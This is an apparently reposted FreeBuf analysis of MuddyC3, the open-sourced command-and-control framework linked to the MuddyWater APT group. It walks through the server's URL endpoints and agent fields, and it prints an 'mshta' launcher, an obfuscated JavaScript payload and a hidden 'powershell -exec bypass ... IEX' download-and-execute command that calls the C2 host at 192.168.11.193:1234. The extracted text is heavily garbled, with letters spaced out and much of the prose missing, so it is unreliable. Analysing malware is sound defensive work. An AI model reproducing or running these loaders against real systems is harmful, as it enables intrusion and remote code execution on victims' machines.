[14614] 2019-09-21_污水攻击MuddyC3开源代码分析

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2019-09-21_污水攻击MuddyC3开源代码分析 M u d d y C 3 D i g A p i s   F r e e B u f   2 0 1 9 - 0 9 - 2 1 M u d d y W a t e r I T m u d d y w a t e r 2 0 1 9 6 2 4 0 x f f f f 0 8 0 0 t w i t t e r p y t h o n m u d d y w a t e r g i t h u b 1 . 0 . 1 M u d d y C 3 C 2 C 2 C 2 w e b C 2 p o w e r s h e l l C 2 C 2 h t t p p o w e r s h e l l A P T 1 2 C 2 3 1 . 1 m u d d y c 3 . p y
i p 1 . 1 . 6 h e l p 1 . 1 . 1   l i s t a g e n t 1 . 1 . 2   s h o w 1 . 1 . 3   u s e u s e a g e n t   i d i d 2 . 2 . 2 / g e t 1 . 1 . 4   p a y l o a d p a y l o a d p o w e r s h e l l 1 . 1 . 5   b a c k 1 . 1 . 6   h e l p u s e   i d
1 . 1 . 7   e x i t e x i t 1 . 2 c o r e . c m d . p y A G E N T S * i d k e y 0 E x t e r n a l I P d a t a 1 i d d a t a 2 s t a t u s d a t a 3 o s d a t a 4 I n t e r n a l I P d a t a 5 A r c h d a t a 6 C o m p u t e r N a m e d a t a 7 U s e r N a m e d a t a A G E N T ' i d : d a t a ' d a t a 0 i d 1 s t a t u s 2 I n t e r n a l   I P 3 O S 4 A r c h 5 C o m p u t e r   N a m e 6 U s e r   N a m e c o r e . w e b s e r v e r . p y u r l 访 g e t / p o s t 1 i n d e x / g e t h e l l o 2 p a y l o a d / g e t g e t c o n f i g / P A Y L O A D ( ) 3 p a y l o a d c / g e t c g e t t o B 5 2 ( c o n f i g / P A Y L O A D ( ) ) 4 p a y l o a d j f / h j f g e t C : / / P r o g r a m D a t a a . z i p b . p s 1 5 p a y l o a d j f s / h j f s g e t C : / / P r o g r a m D a t a s c t . i n i 6 s c t / s c t g e t p s 1 7 m s h t a / h t a g e t p s 1 8 i n f o / i n f o / ~ p o s t i d A G E N T S 9 d o w n l o a d / d l / ~ p o s t 1 0 u p l o a d / u p 1 1 i m g / i m g / ~ p o s t i m g 1 2 c o m m a n d / c m / ~ g e t c o n f i g . C O M M A N D [ i d ] 1 3 r e s u l t / r e / ~ p o s t i d d a t a 1 4 m o d u l e s / m d / ~ p o s t 1 . 3 w e b s e r v e r 访 C & C 访 i n d e x 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 访 g e t p a y l o a d
访 / g e t c p a y l o a d b a s e 6 4 / h j f / h j f s 访 d o w n l o a d
访 / i n f o , i n f o 使 p o s t A G E N T S p o s t b o d y 访 i n f o p o s t 2 . 1 p y t h o n p o w e r s h e l l p o w e r s h e l l
2 . 2 2 . 2 . 1 访 / i n f o 访 / i n f o i d p o s t i d N O N E 2 . 2 . 2 访 / c m i d 访 / c m 访 / c m / [ i d ] , 1 / g e t 访 / g e t 2 / g e t c 访 / g e t c 3 / h j f 访 / h j f 4 / h j f s 访 / h j f s 5 / s c t 访 / s c t 6 / h t a 访 / h t a 7 d l 访 / d l 8 / u p 访 / u p 9 / i m g 访 / i m g 1 0 / m d 访 / m d 1 1 p o w e r s h e l l 访 / c m / [ i d ] , 2 . 2 . 3 访 / r e / r e / [ i d ] p o w e r s h e l l p o w e r s h e l l p o w e r s h e l l m s h t a   h t t p : / / 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 / h t a
访 h t a j s e s j s p o w e r s h e l l h t t p : / / 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 / g e t g e t p a y l o a d . p s 1 p a y l o a d . p s 1 p o w e r s h e l l 1 2 3 4 9 1 4 1 5 . 1 g e t 5 . 2   h t t p 5 . 3 p o w e r s h e l l m s h t a   h t t p : / / 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 / h t a v a r   e s   =   ' % g k { d m F y I ! ~ t P S J w , 3 d l c n ~ o Z W - s I % 1 l e ! V j I ! J 5 c ! F z c y A t d y A - I % 1 j I % R W P W 5 l d y 1 v Y m p l Y 3 Q g , m V 0 L n d l Y m ~ s [ W V u d @ s k V i 5 w c * * 4 e T 1 , T m V 0 L l d l Y l J l c X V l c 3 R d } j p $ Z X R T e X ~ 0 Z W 1 X Z W J Q c * * 4 e S g p } y R W L l B y , 3 h 5 L k ~ y Z W R l , n R p Y W - z P V t } Z X Q u Q 3 J l Z ! V u d ! l h , e v a l ( b a s ( e s ) ) s t r i n g   =   r e p l a c e A l l ( ' ] ' , ' = ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' [ ' , ' a ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' , ' , ' b ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' @ ' , ' D ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' - ' , ' x ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' ~ ' , ' N ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' * ' , ' E ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' % ' , ' C ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' $ ' , ' H ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' ! ' , ' G ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' { ' , ' K ' , s t r i n g ) ;             s t r i n g   =   r e p l a c e A l l ( ' } ' , ' O ' , s t r i n g ) ;             v a r   c h a r a c t e r s   =   " A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 + / = " ;             v a r   r e s u l t           =   ' ' ; v a r   c m = " p o w e r s h e l l   - e x e c   b y p a s s   - w   1   - c   $ V = n e w - o b j e c t   n e t . w e b c l i e n t ; $ V . p r o x y = [ N e t . W e b R e q u e s t ] : : G e t S y s t e m W e b P r o x y ( ) ; $ V . P r o x y . C r e d e n t i a l s = [ N e t . C r e d e n t i a l C a c h e ] : : D e f a u l t C r e d e n t i a l s ; I E X ( v a r   w 3 2 p s =   G e t O b j e c t ( ' w i n m g m t s : ' ) . G e t ( ' W i n 3 2 _ P r o c e s s S t a r t u p ' ) ; w 3 2 p s . S p a w n I n s t a n c e _ ( ) ; w 3 2 p s . S h o w W i n d o w = 0 ; v a r   r t r n C o d e = G e t O b j e c t ( ' w i n m g m t s : ' ) . G e t ( ' W i n 3 2 _ P r o c e s s ' ) . C r e a t e ( c m , ' c : ' , w 3 2 p s , n u l l ) ; h t t p : / / 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 / c m / [ i d ] h t t p : / / 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 / c m / [ i d ] h t t p : / / 1 9 2 . 1 6 8 . 1 1 . 1 9 3 : 1 2 3 4 / r e / [ i d ]
使 p o w e r s h e l l p o w e r s h e l l 使 C 2 5 . 4 w e b 2 . 0 访 h t t p w e b 2 . 0 5 . 5 h t t p 1 h t t p s : / / g i t h u b . c o m / 0 x f f f f 0 8 0 0 / M u d d y C 3 v 1 . 0 . 1 - 2 m u d d y w a t e r h t t p s : / / a t t a c k . m i t r e . o r g / g r o u p s / G 0 0 6 9 / * B U P T / Y o n i F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则